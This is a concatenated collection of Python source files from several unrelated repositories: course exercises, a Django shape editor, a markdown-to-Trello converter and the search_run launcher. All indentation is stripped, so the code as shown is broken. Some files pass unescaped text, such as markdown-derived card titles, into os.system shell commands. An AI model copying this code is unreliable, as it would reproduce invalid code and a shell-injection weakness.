self.cars.append(new_car)
def move(self):
"""Makes all the cars move forward"""
for car in self.cars:
# Makes the current car go forward
car.forward(self.speed)
def increase_speed(self):
"""Increases the speed of all the cars"""
# Increases cars speed by the value of the constant MOVE_INCREMENT
self.speed += MOVE_INCREMENT
```
#### File: Day 34/day_34/main.py
```python
def police_check(age: int) -> bool:
if age > 18:
can_drive = True
else:
can_drive = False
return "string"
if police_check("twelve"):
print("You may pass.")
else:
print("Pay a fine.")
```
#### File: day-5-1-exercise/test-your-code/main.py
```python
student_heights = input("Input a list of student heights ").split()
for n in range(0, len(student_heights)):
student_heights[n] = int(student_heights[n])
# 🚨 Don't change the code above 👆
#First *fork* your copy. Then copy-paste your code below this line 👇
#Finally click "Run" to execute the tests
#Initializes variables that will store the count of students and the total height
students_count = 0
total_height = 0
#Goes through the list of heights
for height in student_heights:
#Adds one to the count
students_count += 1
#Adds the height to the total
total_height += height
#Computes the average height
avg_height = round(total_height / students_count)
#Prints the average height
print(avg_height)
#Write your code above this line 👆
# 🚨 Do NOT modify the code below this line 👇
with open('testing_copy.py', 'w') as file:
file.write('def test_func():\n')
with open('main.py', 'r') as original:
f2 = original.readlines()[0:40]
for x in f2:
file.write(" " + x)
import testing_copy
import unittest
from unittest.mock import patch
from io import StringIO
import os
class MyTest(unittest.TestCase):
def run_test(self, given_answer, expected_print):
with patch('builtins.input', return_value=given_answer), patch('sys.stdout', new=StringIO()) as fake_out:
testing_copy.test_func()
self.assertEqual(fake_out.getvalue(), expected_print)
def test_1(self):
self.run_test(given_answer='180 124 165 173 189 169 146', expected_print='164\n')
def test_2(self):
self.run_test(given_answer='150 142 185 120 171 184 149 199', expected_print='162\n')
def test_3(self):
self.run_test(given_answer='24 59 68', expected_print='50\n')
print("\n\n\n.\n.\n.")
print('Checking that your code prints a single number - the average height - rounded to the nearest integer for several different lists of heights.\n')
print('\nRunning some tests on your code:')
print(".\n.\n.")
unittest.main(verbosity=1, exit=False)
os.remove("testing_copy.py")
```
#### File: day-8-1-exercise/test-your-code/main.py
```python
from math import ceil
#Defines the function paint_calc with 3 parameters : height of the wall, width of the wall and coverage
def paint_calc(height, width, cover):
#Computes the number of cans needed
cans_number = ceil(height * width / cover)
#Prints the result
print(f"You'll need {cans_number} cans of paint.")
#Write your code above this line 👆
# 🚨 Don't change the code below 👇
test_h = int(input("Height of wall: "))
test_w = int(input("Width of wall: "))
coverage = 5
paint_calc(height=test_h, width=test_w, cover=coverage)
# Tests
import unittest
from unittest.mock import patch
from io import StringIO
class MyTest(unittest.TestCase):
# Testing Print output
def test_1(self):
with patch('sys.stdout', new = StringIO()) as fake_out:
paint_calc(3, 6, 5)
expected_print = "You'll need 4 cans of paint.\n"
self.assertEqual(fake_out.getvalue(), expected_print)
def test_2(self):
with patch('sys.stdout', new = StringIO()) as fake_out:
paint_calc(3, 9, 5)
expected_print = "You'll need 6 cans of paint.\n"
self.assertEqual(fake_out.getvalue(), expected_print)
def test_3(self):
with patch('sys.stdout', new = StringIO()) as fake_out:
paint_calc(7, 9, 2)
expected_print = "You'll need 32 cans of paint.\n"
self.assertEqual(fake_out.getvalue(), expected_print)
def test_4(self):
with patch('sys.stdout', new = StringIO()) as fake_out:
paint_calc(12, 45, 5)
expected_print = "You'll need 108 cans of paint.\n"
self.assertEqual(fake_out.getvalue(), expected_print)
print("\n")
print('Running some tests on your code:')
print(".\n.\n.\n.")
unittest.main(verbosity=1, exit=False)
```
#### File: Day 8/day-8-2-exercise/main.py
```python
def prime_checker(number):
#Inititalizes the variable storing the result
prime = True
#Goes thourgh all the number from 2 to the tested number - 1
for i in range(2, number):
#Tests if the tested number is divisible by the current number
if number % i == 0:
#As the tested number is divisible by the current number, it's not a prime number
prime = False
#Prints whether the number is prime or not depending of the value of the variable prime
if prime == True:
print("It's a prime number.")
else:
print("It's not a prime number.")
#Write your code above this line 👆
#Do NOT change any of the code below👇
n = int(input("Check this number: "))
prime_checker(number=n)
```
#### File: Day 9/day-9-2-exercise/main.py
```python
travel_log = [
{
"country": "France",
"visits": 12,
"cities": ["Paris", "Lille", "Dijon"]
},
{
"country": "Germany",
"visits": 5,
"cities": ["Berlin", "Hamburg", "Stuttgart"]
},
]
#🚨 Do NOT change the code above
#TODO: Write the function that will allow new countries
#to be added to the travel_log. 👇
#Defining a function adding a new country to the travel log
def add_new_country(country, visits, cities):
#Creating a Dictionary for the country using arguments
country = {
"country": country,
"visits": visits,
"cities": cities
}
#Adding the country to the travel log
travel_log.append(country)
#🚨 Do not change the code below
add_new_country("Russia", 2, ["Moscow", "Saint Petersburg"])
print(travel_log)
```
|
{
"source": "jeanbrag/intro-programming",
"score": 4
}
|
#### File: jeanbrag/intro-programming/lista1.py
```python
# Exercício 1: Defina a função intersec(x1,y1,x2,y2,x3,y3,x4,y4) que sucede se, no plano cartesiano,
# há intersecção entre dois retângulos definidos pelos pontos superior esquerdo e inferior direito: (x1,y1) e (x2,y2)
# para o primeiro retângulo e (x3,y3) e (x4,y4) para o segundo.
def intersec(x1,y1,x2,y2,x3,y3,x4,y4):
return intersecx(x1,x2,x3,x4) and intersecy(y1,y2,y3,y4)
def intersecx(x1,x2,x3,x4):
if x3>=x1 and x3<=x2 or x4>=x1 and x4<=x2: return True
else: return False
def intersecy(y1,y2,y3,y4):
if y3<=y1 and y3>=y2 or y4<=y1 and y4>=y2: return True
else: return False
# Exercício 2: A tarifação de uma ligação telefônica internacional é feita do seguinte modo: O valor mínimo é de R$5,
# que dá direito a uma ligação de até 5 minutos. Quando a duração é de até 10 minutos, são cobrados R$7.
# Ligações com mais de 10 minutos pagam R$1 por cada minuto adicional (somados aos R$7 iniciais).
# Defina a função tarifa(m) que associa o valor do custo da ligação com duração de m minutos.
# Por exemplo:
# >>> tarifa(12)
# 9
def tarifa(m):
if m<0: return False
if m<5: return 5
elif m>5 and m<10: return 7
else: return 7+(m-10)
# Exercício 3: Um torcedor fanático deseja confeccionar uma bandeira do Brasil "estilizada" para usar durante os jogos olímpicos de 2016.
# Ele já tem a quantidade de panos verde e azul exatas e precisa saber quantos metros de pano amarelo vai precisar comprar.
# Calcule a quantidade de pano amarelo (em metros quadrados), considerando que a bandeira está no plano cartesiano,
# e que sabemos os valores dos pontos superior esquerdo (x1, y1) e inferior direito (x2, y2)
from math import*
def pano_amarelo(x1,y1,x2,y2):return area_quad(y1,y2)-area_circ(y1,y2)
def quad(x):return x*x
def lado_quad(y1,y2):return sqrt(area_quad(y1,y2))
def area_quad(y1,y2):return (quad(abs(y1-y2)))/2
def raio (x):return (x)/2
def area_circ(y1,y2):return pi*(quad(raio(lado_quad(y1,y2))))
```
|
{
"source": "jeancahu/django_project_template",
"score": 2
}
|
#### File: django_project_template/index/views.py
```python
from django.shortcuts import render
from django.views.decorators.http import require_GET
# Create your views here.
@require_GET
def index(request):
context={
}
return render(request, 'index.html', context)
```
|
{
"source": "jeancahu/GTFS_shapes_editor_JS",
"score": 2
}
|
#### File: src/shapeeditor/admin.py
```python
from django.contrib import admin
from .models import History, Shape, Stop
from django.urls import reverse
# Register your models here.
@admin.register(History)
class SEHistory(admin.ModelAdmin):
list_display = ('pk', 'history_id', 'history_date')
list_display_links = ('history_id',)
ordering = ('-pk',)
search_fields = ('history_id', 'history_date')
fieldsets = (
('History Information', {
'description':
"History saved in data base from Shapeeditor, \
click on \"view on site\" to edit from this version",
'fields': ('history_id',),
}),
)
def view_on_site(self, obj):
url = reverse('shapeeditor', kwargs={'history_id': obj.pk})
return url
@admin.register(Shape)
class SEShape(admin.ModelAdmin):
pass
@admin.register(Stop)
class SEStop(admin.ModelAdmin):
pass
```
#### File: src/shapeeditor/models.py
```python
from django.db import models
# Create your models here.
def default_empty_json(): # TODO
return {}
def default_stop_line(): # TODO
return {'id': [], 'points': [], 'distances': []}
def default_shape_line():
return {'id': [], 'points': [], 'distances': []}
# models
class History (models.Model):
"""
Commands succession to reach a desired state in the editor frontend
"""
history_id = models.CharField(
max_length=80)
history_date = models.DateTimeField(
# Time and date the history was upload
auto_now_add = True,
editable = False,
blank = False
)
history_json = models.JSONField( # TODO: add default
blank = False,
editable = False
)
class Meta:
verbose_name = "History"
verbose_name_plural = "Histories"
def __str__(self):
return '{} - {} ({})'.format(
self.pk,
self.history_id,
self.history_date.strftime("%Y-%m-%d"))
class Stop (models.Model):
"""
Stop, a node near some waypoint in the shape
"""
stop_id = models.CharField(
primary_key=True, # This makes the id unique in database
db_index=True,
max_length=80)
lines = models.JSONField(default=default_stop_line) # TODO replace with multiple fields
def __str__(self):
return self.stop_id
class Shape (models.Model):
"""
Shape, has a unique ID type string, it has an array of geocoordinates and equivalent
1:1 array integral distance (distance from first endpoint)
"""
shape_id = models.CharField(
primary_key=True, # This makes the id unique in database
db_index=True,
max_length=80)
lines = models.JSONField(default=default_shape_line)
def __str__(self):
return self.shape_id
```
|
{
"source": "jeanCarloMachado/markdown_to_trello",
"score": 3
}
|
#### File: markdown_to_trello/markdown_to_trello/markdown_to_trello.py
```python
import os
from typing import List, Optional
from markdown_to_trello.tree_parser import TreeParser
from functools import reduce
import re
class MarkdownToTrello:
def __init__(self, text):
self.text = text
def convert_to_cards(self) -> List['Card']:
cards: List['Card'] = []
parsed_tree = TreeParser().parse(self.text)
for node in parsed_tree:
description = ''
if node.get('nested'):
lines = list(map(lambda x: x['text'], node['nested']))
description = '\n'.join(lines)
cards.append(Card(node['text'], description))
return cards
def _line_empty(self, line: str) -> bool:
return not re.search(".*[A-Za-z0-9]+.*", line)
class Card:
def __init__(self, title, description = ""):
# remove empty spaces in front and the minus of a list
title = re.sub("^\s*- ", '', title)
self.title = title
self.description = description
Command = str
class SaveCards:
def __init__(self, board, lane):
self.board = board
self.lane = lane
def dry_run(self, cards: List['Card']) -> List[Command]:
position = 'top'
commands = []
cards = reversed(cards)
for card in cards:
title = card.title
description = card.description
commands.append(f'trello add-card -b "{self.board}" -l "{self.lane}" "{title}" "{description}" -q {position}')
return commands
def perform(self, cards: List['Card']):
commands = self.dry_run(cards)
for command in commands:
os.system(command)
```
#### File: markdown_to_trello/tests/test_markdown_to_trello.py
```python
import unittest
from markdown_to_trello.markdown_to_trello import MarkdownToTrello, SaveCards, Card
import pytest
class ConverterTest(unittest.TestCase):
def test_simplest(self):
text = 'Do groceries'
cards = MarkdownToTrello(text).convert_to_cards()
self.assertTrue(len(cards), 1)
self.assertEqual(cards[0].title, 'Do groceries')
def test_list_remove_symbol(self):
text = "- Do groceries"
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards[0].title, 'Do groceries')
def test_multiple_lines_multiple_cards(self):
text = "- Do groceries\n- Do laundry"
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards[0].title, 'Do groceries')
self.assertEqual(cards[1].title, 'Do laundry')
def test_empty_line_no_card(self):
text = """
"""
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards, [])
def test_ignore_identation_of_siblings(self):
text = """
- Do groceries
- Do laundry
"""
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards[0].title, 'Do groceries')
self.assertEqual(cards[1].title, 'Do laundry')
def test_list_with_description(self):
text = """
- Do groceries
- avocado
- laranja
- Do laundry
"""
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards[0].title, 'Do groceries')
self.assertEqual(cards[0].description, ' - avocado\n - laranja')
self.assertEqual(cards[1].title, 'Do laundry')
class SaveTest(unittest.TestCase):
def test_save(self):
result = SaveCards('Myboard','Inbox').dry_run([
Card('buy milk', "my description"),
Card('clean clothes'),
])
self.assertEqual(result[1], 'trello add-card -b "Myboard" -l "Inbox" "buy milk" "my description" -q top')
self.assertEqual(result[0], 'trello add-card -b "Myboard" -l "Inbox" "clean clothes" "" -q top')
```
|
{
"source": "jeanCarloMachado/PythonSearch",
"score": 3
}
|
#### File: search_run/apps/terminal.py
```python
import logging
import os
class Terminal:
""" Terminal abstraction for search run """
DEFAULT_TITLE = "SearchRunTerminal"
@staticmethod
def run_command(cmd) -> bool:
""" runs a shell command raise an exception on failure """
message = f'=> Command to run: "{cmd}"'
logging.debug(message)
result = os.system(cmd)
success = result == 0
return success
def wrap_cmd_into_terminal(
self, cmd, title=None, hold_terminal_open_on_end=True
) -> str:
"""
wraps the command in a terminal but does not execute it
"""
if hold_terminal_open_on_end:
cmd = f" {cmd}"
final_cmd = f'kitty -T "{title}" bash -c "{cmd}" '
return final_cmd
```
#### File: PythonSearch/search_run/base_configuration.py
```python
from __future__ import annotations
import inspect
import os
from typing import List, Optional
from search_run.features import FeaturesSupport
class EntriesGroup:
"""
Main configuration of the application. Customers are supposed to pass their own
"""
# the location of the dumped index
commands: dict = {}
def aggregate_commands(self, commands_classes):
"""
aggregates a list of classes or instances
"""
for class_i in commands_classes:
is_class = inspect.isclass(class_i)
instance = class_i() if is_class else class_i
if isinstance(instance, EntriesGroup):
cmd_items = instance.get_hydrated_commands()
else:
cmd_items = instance.commands
self.commands = {**self.commands, **cmd_items}
def get_command(self, given_key):
""" Returns command value based on the key name, must match 11"""
given_key = given_key.lower()
for key, value in self.commands.items():
if key.lower() == given_key:
return value
raise Exception(f"Value not found for key: {given_key}")
def get_keys(self):
keys = []
for key, value in self.commands.items():
keys.append(key)
return keys
def get_hydrated_commands(self):
result = {}
for key, command in self.commands.items():
if type(command) is dict:
if "tags" not in command:
command["tags"] = [self.__class__.__name__]
else:
command["tags"].append(self.__class__.__name__)
result[key] = command
return result
def get_source_file(self):
"""Returns the path of the source code where the config is stored"""
import sys
return sys.argv[0]
def get_project_root(self):
"""
Returns the root of the project where the config is
@todo substitues PROJECT_ROOT with this
"""
source = self.get_source_file()
path = os.path.dirname(source)
# always go 1 path up
return path
class PythonSearchConfiguration(EntriesGroup):
"""
The main configuration of Python Search
Everything to customize about the application should be tunneled through this clas
"""
APPLICATION_TITLE = 'PythonSearch - Search'
commands: dict
def __init__(
self,
*,
entries: Optional[dict] = None,
entries_groups: Optional[List[EntriesGroup]] = None,
supported_features: Optional[FeaturesSupport] = None,
):
if entries:
self.commands = entries
if entries_groups:
self.aggregate_commands(entries_groups)
if supported_features:
self.supported_features = supported_features
else:
self.supported_features = FeaturesSupport.default()
```
#### File: PythonSearch/search_run/cli.py
```python
from search_run.apps.window_manager import I3
from search_run.base_configuration import PythonSearchConfiguration
from search_run.entry_runner import EntryRunner
def error_handler(e):
from search_run.observability.logger import initialize_systemd_logging
logging = initialize_systemd_logging()
import sys
import traceback
exc_info = sys.exc_info()
logging.warning(
f"Unhandled exception: {e}".join(traceback.format_exception(*exc_info))
)
raise e
class PythonSearchCli:
"""
The command line application, entry point of the program.
Try to avoid adding direct commands, prefer instead to add objects as parts of functions
"""
configuration: PythonSearchConfiguration
@staticmethod
def setup_from_config(config: PythonSearchConfiguration):
try:
instance = PythonSearchCli(config)
import fire
fire.Fire(instance)
except BaseException as e:
error_handler(e)
def __init__(self, configuration: PythonSearchConfiguration = None):
"""
Keep this constructor small and import depependenceis inside the functions
so they keep being fast
"""
self.configuration = configuration
self.run_key = EntryRunner(configuration).run_key
def search(self):
"""Main entrypoint of the application"""
from search_run.search_ui.search import Search
Search(self.configuration).run()
def clipboard_key(self, key):
"""
Copies the content of the provided key to the clipboard.
Used by fzf to provide Ctrl-c functionality.
"""
from search_run.interpreter.interpreter import Interpreter
Interpreter.build_instance(self.configuration).clipboard(key)
def edit_key(self, key):
from search_run.entry_capture.edit_content import EditKey
return EditKey(self.configuration).edit_key(key, dry_run=False)
def register_clipboard(self):
from search_run.entry_capture.register_new import RegisterNew
return RegisterNew(self.configuration).infer_from_clipboard()
def register_snippet_clipboard(self):
from search_run.entry_capture.register_new import RegisterNew
return RegisterNew(self.configuration).snippet_from_clipboard()
def register_new(self):
from search_run.entry_capture.register_new import RegisterNew
return RegisterNew(self.configuration)
def export_configuration(self):
from search_run.configuration_generator import ConfigurationGenerator
configuration_exporter = ConfigurationGenerator(self.configuration)
configuration_exporter.export()
def ranking(self):
from search_run.ranking.ranking import RankingGenerator
return RankingGenerator(self.configuration)
def consumers(self):
"""Provides access to the event consumers"""
from search_run.events.latest_used_entries import LatestUsedEntries
class Consumers:
def latest_used_entries(self):
LatestUsedEntries().consume()
return Consumers()
def features(self):
from search_run.features import FeatureToggle
return FeatureToggle()
def _utils(self):
"""Here commands that are small topics and dont fit the rest"""
class Utils:
def __init__(self, configuration):
self.configuration = configuration
def hide_launcher(self):
"""hide the search launcher -i2 specific"""
I3().hide_window(self.configuration.APPLICATION_TITLE)
return Utils(self.configuration)
```
#### File: PythonSearch/search_run/context.py
```python
import os
class Context:
"""
captures information from the enviroment
to contextualize how to execute the command
"""
_instance = None
_is_cli: bool = False
_is_group_command = False
_should_execute_sequentially = False
_input = None
@staticmethod
def get_instance():
if not Context._instance:
Context._instance = Context()
return Context._instance
def is_cli(self):
if os.environ.get("DISABLE_CLI"):
return False
return self._is_cli
def enable_gui_mode(self):
self._is_cli = False
return self
def enable_group_command(self):
self._is_group_command = True
return self
def is_group_command(self):
return self._is_group_command
def enable_sequential_execution(self):
self._should_execute_sequentially = True
def disable_sequential_execution(self):
self._should_execute_sequentially = False
def should_execute_sequentially(self):
return self._should_execute_sequentially
def set_interpreter(self, interpreter):
self._interpreter = interpreter
def get_interpreter(self):
return self._interpreter
def set_input(self, input):
self._input = input
def get_input(self):
return self._input
```
#### File: search_run/interpreter/cmd.py
```python
import logging
from grimoire.notification import send_notification
from grimoire.shell import shell
from grimoire.string import remove_special_chars
from search_run.apps.terminal import Terminal
from search_run.context import Context
from search_run.exceptions import CommandDoNotMatchException
from search_run.interpreter.base import BaseEntry
WRAP_IN_TERMINAL = "new-window-non-cli"
class CmdEntry(BaseEntry):
"""
Represents a bash command entry
"""
def __init__(self, cmd, context: Context):
self.context = context
if type(cmd) == str:
self.cmd = {WRAP_IN_TERMINAL: True, "cmd": cmd}
return
if WRAP_IN_TERMINAL in cmd and "cmd" in cmd:
self.cmd = cmd
return
if "cli_cmd" in cmd:
self.cmd = cmd
self.cmd["cmd"] = cmd["cli_cmd"]
self.cmd[WRAP_IN_TERMINAL] = True
return
if "cmd" in cmd:
self.cmd = cmd
return
raise CommandDoNotMatchException.not_valid_command(self, cmd)
def interpret_default(self):
if self.try_to_focus():
return
cmd = self.apply_directory(self.cmd["cmd"])
if "high_priority" in self.cmd:
cmd = f"nice -19 {cmd}"
if "directory" in self.cmd:
cmd = f'cd {self.cmd["directory"]} && {cmd}'
if "tmux" in self.cmd:
cmd = f'tmux new -s "{self._get_window_title()}" {cmd} '
if WRAP_IN_TERMINAL in self.cmd:
cmd = f"{cmd} ; tail -f /dev/null"
cmd = self._try_to_wrap_in_terminal(cmd)
logging.info(f"Command to run: {cmd}")
result = self._execute(cmd)
logging.info(f"Result finished: {result}")
return self.return_result(result)
def _try_to_wrap_in_terminal(self, cmd):
if WRAP_IN_TERMINAL in self.cmd:
logging.info("Running it in a new terminal")
cmd = Terminal().wrap_cmd_into_terminal(
cmd,
title=self._get_window_title(),
hold_terminal_open_on_end=True,
)
logging.info(f"Command to run: {cmd}")
return cmd
def _get_window_title(self):
if "window_title" in self.cmd:
return self.cmd["window_title"]
title = self.cmd["cmd"]
if "focus_match" in self.cmd:
title = self.cmd["focus_match"]
return remove_special_chars(title, [" "])
def _execute(self, cmd):
logging.info(f"Command to run: {cmd}")
if (
self.context.is_group_command()
and not self.context.should_execute_sequentially()
):
return shell.run_command_no_wait(cmd)
if self.context.should_execute_sequentially():
return shell.run_with_result(cmd)
return shell.run(cmd)
def return_result(self, result):
if "notify-result" in self.cmd:
send_notification(result)
return result
def copiable_part(self):
return self.cmd["cmd"]
```
#### File: ranking/baseline/serve.py
```python
import datetime
import json
import logging
from typing import List
import mlflow
import numpy as np
from mlflow.entities import RunInfo
from mlflow.tracking import MlflowClient
from search_run.infrastructure.redis import get_redis_client
location = "/home/jean/projects/PySearchEntries/mlflow"
def get_ranked_keys(
disable_cache=False, day_of_week=None, week_number=None
) -> List[str]:
rank_cache = RankCache()
rank = rank_cache.get_rank()
if rank and not disable_cache:
# logging.info('Using cached rank')
return rank
model = load_trained_model()
keys_embeddings = load_precomputed_keys_embeddings()
saved_keys = keys_embeddings.keys()
embeddings = list(keys_embeddings.values())
embeddings = np.array(embeddings)
today_dataset = np.concatenate(
(date_features(len(saved_keys), day_of_week, week_number), embeddings), axis=1
)
result = model.predict(today_dataset)
result_with_key = list(zip(saved_keys, result))
sorted_list = sorted(result_with_key, key=lambda x: x[1], reverse=True)
ranked_list = [x[0] for x in sorted_list]
rank_cache.update_cache(ranked_list)
return ranked_list
def date_features(number_of_keys, day_of_week=None, week_number=None) -> np.ndarray:
"""
generate the remaining date related features artifically, to be concatenated in teh final dataset for prediction
"""
day_of_week = (
day_of_week if day_of_week else datetime.datetime.today().isocalendar()[2]
)
week_number = (
week_number if week_number else datetime.datetime.today().isocalendar()[1]
)
day_of_week_vec = np.full((number_of_keys, 1), day_of_week)
week_number_vec = np.full((number_of_keys, 1), week_number)
return np.concatenate((week_number_vec, day_of_week_vec), axis=1)
def load_trained_model():
run = get_latest_run()
logging.debug(f"RUn id: {run.run_id}")
return mlflow.xgboost.load_model(f"runs:/{run.run_id}/model")
def load_precomputed_keys_embeddings():
uri = get_latest_run().artifact_uri
path = uri.replace("file://", "") + "/keys_embeddings.json"
logging.debug(f"Path: {path}")
with open(path, "r") as f:
keys_embeddings = json.load(f)
return keys_embeddings
def get_latest_run() -> RunInfo:
experiment_name = "baseline_rank_v0"
mlflow.set_tracking_uri(f"file:{location}")
client: MlflowClient = MlflowClient()
experiment = client.get_experiment_by_name(experiment_name)
logging.debug(f"Experiment id: {experiment.experiment_id}")
runs = client.list_run_infos(experiment_id=experiment.experiment_id)
return runs[0]
class RankCache:
def __init__(self):
self.redis = get_redis_client()
def clear(self):
return self.redis.delete("cached_rank")
def get_rank(self):
result = self.redis.get("cached_rank")
if result:
return json.loads(result)
def update_cache(self, ranked_list):
self.redis.set("cached_rank", json.dumps(ranked_list))
```
#### File: ranking/next_item_predictor/end2end.py
```python
import logging
import sys
from pyspark.sql.session import SparkSession
from search_run.observability.logger import initialize_logging
initialize_logging()
class EndToEnd:
def build_dataset(self):
from search_run.datasets.searchesperformed import SearchesPerformed
logging.basicConfig(level=logging.INFO, handlers=[logging.StreamHandler(sys.stdout)]),
spark = SparkSession.builder.getOrCreate()
df = SearchesPerformed(spark).load()
df.sort('timestamp', ascending=False).show()
# build pair dataset with label
import pyspark.sql.functions as F
from pyspark.sql.window import Window
## add literal column
df = df.withColumn('tmp', F.lit('toremove'))
window = Window.partitionBy('tmp').orderBy('timestamp')
df = df.withColumn('row_number', F.row_number().over(window)).sort('timestamp', ascending=False)
df = df.withColumn('previous_key', F.lag('key', 1, None).over(window)).sort('timestamp', ascending=False)
pair = df.select("key", "previous_key", 'timestamp')
grouped = pair.groupBy('key', 'previous_key').agg(F.count('previous_key').alias('times')).sort('key', 'times')
grouped.cache()
grouped.count()
## add the label
dataset = grouped.withColumn('label', F.col('times') / F.sum('times').over(Window.partitionBy('key'))).orderBy \
('key')
dataset = dataset.select('key',
'previous_key',
'label')
dataset = dataset.filter("LENGTH(key) > 1")
return dataset
def baseline_mse(self, dataset):
# naive approach of setting the same as input and output, used as baseline to measure the real model against
from sklearn.metrics import mean_squared_error
# apply only to the ones with the same name in input and output
# complete dataset 8k, with the same name in input and output 150
naive = dataset.filter('key == previous_key').select('key', 'label').withColumn('baseline', F.lit(1))
pd_naive = naive.select('label', 'baseline').toPandas()
return mean_squared_error(pd_naive.label, pd_naive.baseline)
def run(self):
logging.info("End to end ranking")
dataset = self.build_dataset()
print("MSE baseline: ", self.baseline_mse(dataset))
dataset.show(n=10)
if __name__ == "__main__":
import fire
fire.Fire(EndToEnd)
```
#### File: tests/entry_capture/test_register_new.py
```python
from search_run.entry_capture.register_new import \
transform_into_anonymous_entry
def test_only_value():
input_data = "a snippet"
result = transform_into_anonymous_entry(input_data)
assert result[0].startswith("no key ")
assert result[1] == {
"snippet": "a snippet",
}
```
#### File: PythonSearch/tests/test_acronyms.py
```python
from search_run.acronyms import generate_acronym
def test_acronyms():
assert generate_acronym("groceries list page") == "glp"
assert generate_acronym("pool tech interview") == "pti"
```
#### File: PythonSearch/tests/utils.py
```python
from search_run.base_configuration import EntriesGroup
def build_config(given_commands):
class Configuration(EntriesGroup):
commands = given_commands
return Configuration()
```
|
{
"source": "jeanCarloMachado/search_run",
"score": 3
}
|
#### File: search_run/search_run/base_configuration.py
```python
from __future__ import annotations
import os
from search_run.config import DataPaths
class BaseConfiguration:
"""
Main configuration of the application. Customers are supposed to pass their own
"""
# the location of the dumped index
cached_filename: str = DataPaths.cached_configuration
commands: dict = {}
def __init__(self):
pass
def get_command(self, given_key):
""" Returns command value based on the key name, must match 11"""
given_key = given_key.lower()
for key, value in self.commands.items():
if key.lower() == given_key:
return value
raise Exception(f"Value not found for key: {given_key}")
def get_keys(self):
keys = []
for key, value in self.commands.items():
keys.append(key)
return keys
def get_hydrated_commands(self):
result = {}
for key, command in self.commands.items():
if type(command) is dict:
if "tags" not in command:
command["tags"] = [self.__class__.__name__]
else:
command["tags"].append(self.__class__.__name__)
result[key] = command
return result
def aggregate_commands(self, commands_classes):
for class_i in commands_classes:
instance = class_i()
if issubclass(class_i, BaseConfiguration):
cmd_items = instance.get_hydrated_commands()
else:
cmd_items = instance.commands
self.commands = {**self.commands, **cmd_items}
def get_cached_filename(self):
return self.cached_filename
def get_source_file(self):
"""Returns the path of the source code where the config is stored"""
import inspect
return inspect.getfile(self.__class__)
def get_project_root(self):
"""
Returns the root of the project where the config is
@todo substitues PROJECT_ROOT with this
"""
source = self.get_source_file()
path = os.path.dirname(source)
# always go 1 path up
path = f"{path}/.."
return path
class BaseEntry(BaseConfiguration):
"""defined as a replacement of base configuration for system entry classes"""
pass
```
#### File: search_run/search_run/core_entities.py
```python
from __future__ import annotations
from enum import Enum
from typing import List, Optional
from numpy import ndarray
class Entry:
"""
An python dictionary we write in PythonSearch
"""
name: str
value: Optional[dict]
embedding: Optional[ndarray]
similarity_score: Optional[float]
def __init__(self, *, name: str, value: dict = None, embedding=None):
self.name = name
self.value = value
self.embedding = embedding
def has_embedding(self) -> bool:
return self.embedding is not None
def get_similarity_score(self) -> float:
""" returns a score, if none will then return 0"""
return self.similarity_score if self.similarity_score else 0.0
def serialize(self) -> str:
return f"{self.name} {self.value}"
class Ranking:
entries: List[Entry] = []
def __init__(self, *, ranked_entries: List[Entry]):
self.entries = ranked_entries
def get_only_names(self) -> List[str]:
return [entry.name for entry in self.entries]
class InvertedIndex:
"""
The entity that gets persisted to disk
"""
entries: List[Entry]
@staticmethod
def from_entries_dict(dict: dict) -> InvertedIndex:
instance = InvertedIndex()
instance.entries = []
for key, value in dict.items():
instance.entries.append(Entry(name=key, value=value))
return instance
def serialize(self) -> str:
pass
```
#### File: search_run/interpreter/base.py
```python
from __future__ import annotations
import json
from grimoire.desktop.clipboard import Clipboard
from grimoire.desktop.dmenu import Dmenu
from grimoire.desktop.window import Window
from grimoire.logging import logging
from grimoire.notification import send_notification
from grimoire.shell import shell
from search_run.context import Context
class BaseInterpreter:
"""parent of all interpreters, Cannot instantiate directly"""
def __init__(self, cmd, context: Context):
self.cmd = cmd
self.context = context
def default(self) -> None:
if "ask_confirmation" in self.cmd and not self._confirmed_continue():
return
if "call_after" in self.cmd or "call_before" in self.cmd:
logging.info("Enabled sequential execution flag enabled")
self.context.enable_sequential_execution()
if "disable_sequential_execution" in self.cmd:
self.context.disable_sequential_execution()
logging.info("Disable sequential execution flag enabled")
self._call_before()
self.interpret_default()
self._call_after()
def _confirmed_continue(self) -> bool:
result = Dmenu(
title=f"Type (y) if you wanna to proceed to run command: {self.cmd['cmd']}"
).rofi()
if result == "y":
return True
send_notification(f"Operation cancelled. Confirmation response was '{result}'")
return False
def _call_before(self):
if "call_before" not in self.cmd:
return
logging.info("Call before enabled")
logging.info(f"Executing post-processing cmd {self.cmd['call_before']}")
self.context.get_interpreter().default(self.cmd["call_before"])
def _call_after(self):
if "call_after" not in self.cmd:
return
logging.info("Call after enabled")
logging.info(f"Executing post-processing cmd {self.cmd['call_after']}")
self.context.get_interpreter().default(self.cmd["call_after"])
def interpret_default(self):
raise Exception("Implement me!")
def interpret_clipboard(self):
return Clipboard().set_content(self.copiable_part())
def copiable_part(self):
return self.serialize()
def serialize(self):
return str(self.cmd)
def to_dict(self):
return self.cmd
def serialize_entry(self):
return json.dumps(self.cmd)
def apply_directory(self, cmd):
if "directory" in self.cmd:
cmd = f'cd {self.cmd["directory"]} ; {cmd}'
return cmd
def try_to_focus(self) -> bool:
"""
Uses i3 infrastructure to focus on windows if they are already opened
:return:
"""
if "focus_match" not in self.cmd:
return False
focus_identifier = self.cmd["focus_match"]
match_type = self.cmd["match_type"] if "match_type" in self.cmd else "title"
if "focus_match_only_class" in self.cmd:
match_type = "class"
if Window().focus(focus_identifier, match_type=match_type):
logging.info(
"No window after focusing? Maybe it is resized small, try to close the window after focusing."
)
if shell.run(
f"i3-msg '[{match_type}=\"{focus_identifier}\"] scratchpad show'"
):
shell.run('sleep 0.5; i3-msg "floating disable; floating enable"')
else:
shell.run(
f"i3-msg '[{match_type}=\"{focus_identifier}\"] scratchpad show'"
)
return True
return False
```
#### File: search_run/interpreter/snippet.py
```python
from grimoire.desktop.clipboard import Clipboard
from grimoire.shell import shell
from search_run.exceptions import CommandDoNotMatchException
from search_run.interpreter.base import BaseInterpreter
class SnippetInterpreter(BaseInterpreter):
def __init__(self, cmd, context):
self.context = context
if type(cmd) is dict and "snippet" in cmd:
self.cmd = cmd
return
raise CommandDoNotMatchException(
f"Not Valid {self.__class__.__name__} command {cmd}"
)
